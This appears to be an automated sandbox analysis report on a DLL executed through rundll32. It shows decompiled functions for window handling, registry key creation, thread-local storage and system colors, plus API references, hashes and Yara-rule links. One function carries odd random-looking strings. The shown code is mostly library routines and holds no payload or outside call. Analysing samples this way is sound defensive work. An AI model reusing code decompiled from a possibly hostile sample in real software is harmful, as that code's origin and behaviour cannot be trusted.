                                                                                                            0x10006355
                                                                                                            0x1000635a
                                                                                                            0x00000000
                                                                                                            0x10006361
                                                                                                            0x10006367
                                                                                                            0x10006367
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCapture.USER32 ref: 10011299
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 100112B2
                                                                                                            • GetFocus.USER32(?,?,?,?,00000000), ref: 100112C4
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 100112D0
                                                                                                            • GetLastActivePopup.USER32(?), ref: 100112F7
                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10011302
                                                                                                            • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 10011326
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 3219385341-0
                                                                                                            • Opcode ID: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
                                                                                                            • Instruction ID: 5a63e8befbd248d730497780d713f82145d505fb4d7f97fa76e00961cd780979
                                                                                                            • Opcode Fuzzy Hash: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
                                                                                                            • Instruction Fuzzy Hash: BB31057170032AAFE715EB24CC84EAF7BEEEB896C4B224579F400CB159CB31DC4196A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000AA1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000AA1E(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E100069D9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000EC3C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10020F40(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000A84C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000A96A(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                            0x1000aa27
                                                                                                            0x1000aa2e
                                                                                                            0x1000aa34
                                                                                                            0x1000aa39
                                                                                                            0x1000aa5e
                                                                                                            0x1000aa5e
                                                                                                            0x1000aa64
                                                                                                            0x1000aa66
                                                                                                            0x1000aa66
                                                                                                            0x1000aa64
                                                                                                            0x1000aa69
                                                                                                            0x1000aa6e
                                                                                                            0x1000aa72
                                                                                                            0x1000aa75
                                                                                                            0x1000aa75
                                                                                                            0x1000aa78
                                                                                                            0x1000aa80
                                                                                                            0x1000aa85
                                                                                                            0x1000aa85
                                                                                                            0x1000aa88
                                                                                                            0x1000aa8c
                                                                                                            0x1000aa8f
                                                                                                            0x1000aa96
                                                                                                            0x1000aa9b
                                                                                                            0x1000aa9d
                                                                                                            0x1000aaa1
                                                                                                            0x1000aaab
                                                                                                            0x1000aab0
                                                                                                            0x1000aab6
                                                                                                            0x1000aab9
                                                                                                            0x1000aaca
                                                                                                            0x1000aad1
                                                                                                            0x1000aad4
                                                                                                            0x1000aad4
                                                                                                            0x1000aaa1
                                                                                                            0x1000aa9b
                                                                                                            0x1000aaea
                                                                                                            0x1000aaec
                                                                                                            0x1000aafb
                                                                                                            0x1000ab07
                                                                                                            0x1000ab0b
                                                                                                            0x1000ab13
                                                                                                            0x1000ab13
                                                                                                            0x1000ab0b
                                                                                                            0x1000ab1b
                                                                                                            0x1000ab2e

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend_memset
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2997958587-3887548279
                                                                                                            • Opcode ID: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
                                                                                                            • Instruction ID: a20b66fbb02a5be130650eb81bbfdf56ba9fafbfecf6f606b31a3a4f2e66e107
                                                                                                            • Opcode Fuzzy Hash: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
                                                                                                            • Instruction Fuzzy Hash: 7B31A1357007119FEB10DFB8C994A5EB7E8FF4A290F11062DE542A7A96DB31E840CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001A96C Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E1001A96C(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E1000A8F0(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1000EFB3(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1001A96C(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E1000A8F0(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1001A917(_t45, E1000A8F0(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}












                                                                                                            0x1001a96c
                                                                                                            0x1001a96c
                                                                                                            0x1001a96e
                                                                                                            0x1001a975
                                                                                                            0x1001aa15
                                                                                                            0x1001aa19
                                                                                                            0x1001aa28
                                                                                                            0x1001aa2c
                                                                                                            0x1001a9d7
                                                                                                            0x1001a9e7
                                                                                                            0x1001aa3e
                                                                                                            0x00000000
                                                                                                            0x1001aa3e
                                                                                                            0x1001a9e9
                                                                                                            0x1001a9ea
                                                                                                            0x1001a9f1
                                                                                                            0x1001aa03
                                                                                                            0x1001aa32
                                                                                                            0x1001aa32
                                                                                                            0x1001aa33
                                                                                                            0x1001aa35
                                                                                                            0x00000000
                                                                                                            0x1001aa35
                                                                                                            0x1001aa05
                                                                                                            0x1001aa0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001aa10
                                                                                                            0x1001aa10
                                                                                                            0x1001aa10
                                                                                                            0x1001aa11
                                                                                                            0x1001aa12
                                                                                                            0x1001aa36
                                                                                                            0x1001aa3b
                                                                                                            0x00000000
                                                                                                            0x1001aa3d
                                                                                                            0x1001a9f1
                                                                                                            0x00000000
                                                                                                            0x1001aa2e
                                                                                                            0x1001a98a
                                                                                                            0x1001a98f
                                                                                                            0x1001a9c3
                                                                                                            0x1001a9ab
                                                                                                            0x1001a9af
                                                                                                            0x00000000
                                                                                                            0x1001a9b5
                                                                                                            0x1001a9be
                                                                                                            0x00000000
                                                                                                            0x1001a9be
                                                                                                            0x1001a9af
                                                                                                            0x1001a9d5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 506644340-0
                                                                                                            • Opcode ID: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
                                                                                                            • Instruction ID: afcf25548e9ffcd49ee0c38f979e935dd92c7862c2c1ebd23c82871fc7a90cd9
                                                                                                            • Opcode Fuzzy Hash: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
                                                                                                            • Instruction Fuzzy Hash: 0121B232A407516FD621DA758D05F1B76ECFF4A690F424524F981AF152EB30ECC0C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010EA7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010EA7(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                            0x10010ec2
                                                                                                            0x10010ec9
                                                                                                            0x10010ecc
                                                                                                            0x10010ecf
                                                                                                            0x10010ed2
                                                                                                            0x10010edd
                                                                                                            0x10010f14
                                                                                                            0x10010f14
                                                                                                            0x10010f1f
                                                                                                            0x10010f24
                                                                                                            0x10010f24
                                                                                                            0x10010f29
                                                                                                            0x10010f2e
                                                                                                            0x10010f2e
                                                                                                            0x10010f37

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10010ED5
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010EF8
                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010F14
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10010F24
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10010F2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreate$Open
                                                                                                            • String ID: software
                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                            • Opcode ID: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
                                                                                                            • Instruction ID: 6908282d98887baf5b1b11d67664c0e969dcc26382147783454bf2a56fb15221
                                                                                                            • Opcode Fuzzy Hash: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
                                                                                                            • Instruction Fuzzy Hash: DF11E376D00159FBDB21DB9ACD89CDFFFBCEF89750B1040AAB600A6122D2709A41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100021CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100021FF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002222
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002238
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000225F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
                                                                                                            • Instruction ID: 4ec50c83481157a01d9dbb3de4afa19c59092b64c33b3db984519a0354e02278
                                                                                                            • Opcode Fuzzy Hash: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
                                                                                                            • Instruction Fuzzy Hash: 18115176604225BFE201DB85DD81E96B7DCEF4A784F024046FF44EB2A1C721BC548EA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100109B6 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E100109B6(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E100209E8(0, 0);
				_t22 = E100010C9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E10004E3A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10020F40(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1001FC9C(_t28);
			}












                                                                                                            0x100109b6
                                                                                                            0x100109b6
                                                                                                            0x100109b6
                                                                                                            0x100109bd
                                                                                                            0x100109c7
                                                                                                            0x100109d3
                                                                                                            0x100109d9
                                                                                                            0x100109de
                                                                                                            0x100109e4
                                                                                                            0x100109e6
                                                                                                            0x100109eb
                                                                                                            0x100109f1
                                                                                                            0x100109f1
                                                                                                            0x100109f9
                                                                                                            0x10010a0a
                                                                                                            0x10010a16
                                                                                                            0x10010a1b
                                                                                                            0x10010a21
                                                                                                            0x10010a24
                                                                                                            0x10010a29
                                                                                                            0x10010a33
                                                                                                            0x10010a33
                                                                                                            0x10010a36
                                                                                                            0x10010a3c
                                                                                                            0x10010a47

                                                                                                            APIs
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 100109BD
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 100109C7
                                                                                                              • Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28
                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6), ref: 100109DE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
                                                                                                              • Part of subcall function 10004E3A: __CxxThrowException@8.LIBCMT ref: 10004E4E
                                                                                                            • _memset.LIBCMT ref: 10010A0A
                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 356813703-0
                                                                                                            • Opcode ID: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
                                                                                                            • Instruction ID: 46b5b42a71e0509a224d2307cf2bd15c4222dc2e63f5f7ecafe87185b2be41b2
                                                                                                            • Opcode Fuzzy Hash: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
                                                                                                            • Instruction Fuzzy Hash: CC117C74100605AFE721EF60CC8AC6BBBA5FF08354B50C129F9869A567CB71ED90CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010DB4 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010DB4(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                                                            0x10010dbe
                                                                                                            0x10010dc4
                                                                                                            0x10010dcb
                                                                                                            0x10010dd2
                                                                                                            0x10010dd9
                                                                                                            0x10010de6
                                                                                                            0x10010ded
                                                                                                            0x10010df0
                                                                                                            0x10010df3
                                                                                                            0x10010df7

                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(0000000F), ref: 10010DC0
                                                                                                            • GetSysColor.USER32(00000010), ref: 10010DC7
                                                                                                            • GetSysColor.USER32(00000014), ref: 10010DCE
                                                                                                            • GetSysColor.USER32(00000012), ref: 10010DD5
                                                                                                            • GetSysColor.USER32(00000006), ref: 10010DDC
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 10010DE9
                                                                                                            • GetSysColorBrush.USER32(00000006), ref: 10010DF0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Brush
                                                                                                            • String ID:
                                                                                                            • API String ID: 2798902688-0
                                                                                                            • Opcode ID: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
                                                                                                            • Instruction ID: d7120ba38cccac322e287d397fd1090e884fedfb1f22003e23e449693bce91bf
                                                                                                            • Opcode Fuzzy Hash: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
                                                                                                            • Instruction Fuzzy Hash: 4DF0F8719407489BE730BB728D49B47BAE1EFC4B10F02092AD2818BA91E6B6E0409F40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

